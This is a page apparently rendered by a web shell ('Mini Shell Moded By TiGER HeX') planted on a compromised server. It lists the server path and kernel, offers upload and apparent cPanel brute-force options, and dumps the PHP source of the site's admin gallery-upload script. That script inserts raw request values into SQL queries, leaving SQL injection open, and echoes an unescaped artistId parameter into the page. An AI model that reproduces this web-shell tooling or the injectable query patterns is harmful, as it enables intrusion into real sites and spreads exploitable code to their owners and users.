Mini Shell Moded By TiGER HeX
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
var
/
www
/
50mmla
/
admin
/
Linux midnightridazz 4.19.0-11-cloud-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
Upload File :
New :
File
Dir
//var/www/50mmla/admin/galleryAdd.php
<? include_once('../includes/static/configure.php'); include_once('../includes/static/util.php'); include_once('../includes/static/dbcon.php'); include_once('../includes/static/gdimg.php'); include_once('../includes/static/sessions.php'); include_once('includes/static/util.php'); include_once('includes/appTop.php'); $page_id = str_replace(".php","",basename($_SERVER['PHP_SELF'])); if(!has_permission($page_id)){ die("You don't have permission to view this page!"); } $html = ""; $story_title = ""; $story_body = ""; $uid=0; $num_uploads = 10; if(isset($_SESSION['admin_id'])){ $uid = $_SESSION['admin_id']; }elseif(isset($_SESSION['editor_id'])){ $uid = $_SESSION['editor_id']; } //artistId has been passed to this page so show appropriate fields if(isset($_REQUEST['artistId'])){ $artist_defined = true; }else{ $artist_defined = false; } if(isset($_POST['submit'])){ for($i=1;$i<$num_uploads;$i++){ $cur_file = $_FILES['file'.$i]['name']; $cur_temp = $_FILES['file'.$i]['tmp_name']; $cur_mime = $_FILES['file'.$i]['type']; $cur_size = $_FILES['file'.$i]['size']; $cur_error = $_FILES['file'.$i]['error']; $comment = $_REQUEST['comment'.$i]; $location = $_REQUEST['location'.$i]; $year= $_REQUEST['year'.$i]; $artist_id = $_REQUEST['artist'.$i]; if(empty($artist_id)){ $artist_id = 0; } $new_artist = $_REQUEST['newArtist'.$i]; if(!empty($cur_file)){ $valid = validate_content($cur_error,$cur_mime,$cur_size,$cur_file,GALLERY_MAX_KB); if($valid['result']){ $type = explode("/",$cur_mime); $cur_type = trim($type[0]); $unique_name = get_unique_filename($cur_file); $gd = new gd_img($cur_mime,$cur_temp); if(!$gd->img_id){ die($gd->gd_error);} $id = $gd->img_id; //create thumbnail $id_t = $gd->gd_crop_img(GALLERY_THUMB_WIDTH,GALLERY_THUMB_HEIGHT,IMG_QUALITY); if(!$id_t){ die($gd->gd_error);} $res = $gd->gd_create_img($id_t,ROOT_DIR.GALLERY_SIMG_DIR.$unique_name); if(!$res){ die($gd->gd_error);} //create watermark image $w_type = getimagesize(WATERMARK_FILE); $gdw = new gd_img($w_type['mime'],WATERMARK_FILE); if(!$gdw->img_id){ die($gdw->gd_error);} //apply watermark $res = $gd->gd_merge_ids($id,$gdw->img_id); if(!$res){ die($gd->gd_error);} //create image $res = $gd->gd_create_img($id,ROOT_DIR.GALLERY_LIMG_DIR.$unique_name); if(!$res){ die($gd->gd_error);} //add new artist if(!empty($new_artist)){ $sql = "INSERT INTO 50mm_artists (artist_name,location,user_id,approved,entry_time) VALUES ('$new_artist','$location','$uid',1,NOW())"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } $sql = "SELECT LAST_INSERT_ID() AS artist_id"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } $row = $db->sql_fetchrow($result); $artist_id = $row['artist_id']; } //add photo $sql = "INSERT INTO 50mm_gallery (artist_id,image,user_id,comment,year_painted,location,approved,entry_time) VALUES ('$artist_id','$unique_name','$uid','$comment','$year','$location',1,NOW())"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } $html.= "<div class=\"hilite\">Your have successfully added your flick!</div>"; }else{ $html.="<div class=\"error\">Unable to store the following content $cur_file<br> Reason: ".$valid['error']."</div>"; } } } } include_once('includes/header.php'); ?> <?echo $html;?> <script> divs = new Array('file1'); </script> <form id="gallery" action="<?echo $_SERVER['PHP_SELF']?>" method="post" enctype="multipart/form-data" onSubmit="return validateForm(this,divs,'flickError');"> <? if(!$artist_defined){ $sql = "SELECT artist_name,artist_id FROM 50mm_artists WHERE approved = 1 ORDER BY artist_name ASC"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } $artist_dd = "<option value=\"\">-- select artist --</option>\n"; while($row = $db->sql_fetchrow($result)){ $artist_dd.= "<option value=\"".$row['artist_id']."\">".$row['artist_name']."</option>\n"; } } $year = 1901; $year_end = date('Y') + 1; $year_dd= "<option value=\"\">-- select year --</option>\n"; for($year;$year<=$year_end;$year++){ $year_dd.= "<option value=\"".$year."\">".$year."</option>\n"; } $form = ""; for($i=1;$i<$num_uploads;$i++){ if($i==1){ $form.="Upload Image:<span id=\"errfile1\" class=\"error\" style=\"visibility:hidden;\"> *</span><br><input type=\"file\" name=\"file".$i."\" class=\"field\"><br>\n"; }else{ $form.="Upload Image:<br><input type=\"file\" name=\"file".$i."\" class=\"field\"><br>\n"; } //then we must choose and artist if(!$artist_defined){ $form.="Select an existing 50mm artist:<br>"; $form.= "<select name=\"artist".$i."\">\n"; $form.= $artist_dd; $form.= "</select><br>\n"; $form.= "Or Add a new 50mm artist:<br><input type=\"text\" name=\"newArtist".$i."\" value=\"\" class=\"field\"><br>\n"; }else{//we've hotlinked here from another page $form.= "<input type=\"hidden\" name=\"artist".$i."\" value=\"".$_REQUEST['artistId']."\"><br>"; $form.= "<input type=\"hidden\" name=\"newArtist".$i."\" value=\"\">\n"; $form.= "<input type=\"hidden\" name=\"artistId\" value=\"".$_REQUEST['artistId']."\"><br>"; } $form.="Year Painted:<br>"; $form.= "<select name=\"year".$i."\">\n"; $form.= $year_dd; $form.= "</select><br>\n"; $form.= "City/Country:<br><input type=\"text\" name=\"location".$i."\" value=\"\" class=\"field\"><br>\n"; $form.= "Comments Or Additonal Artist:<br><textarea wrap=\"on\" name=\"comment".$i."\" class=\"body\" style=\"width: 400px; height:70px;\"></textarea><br>\n"; $form.="<br><div class=\"borderLines\" height=\"1\"><img src=\"/images/spacer.gif\" width=\"600\" height=\"1\"></div><br>\n"; } $form.="<input name=\"submit\" type=\"submit\" class=\"button\" value=\"Submit Photo\">\n"; $form.="<div id=\"flickError\" class=\"error\" style=\"visibility:hidden;\">Please correct the fields marked by *</div>"; echo $form; ?> </form> <? include_once('includes/footer.php'); include_once('includes/appBottom.php'); ?>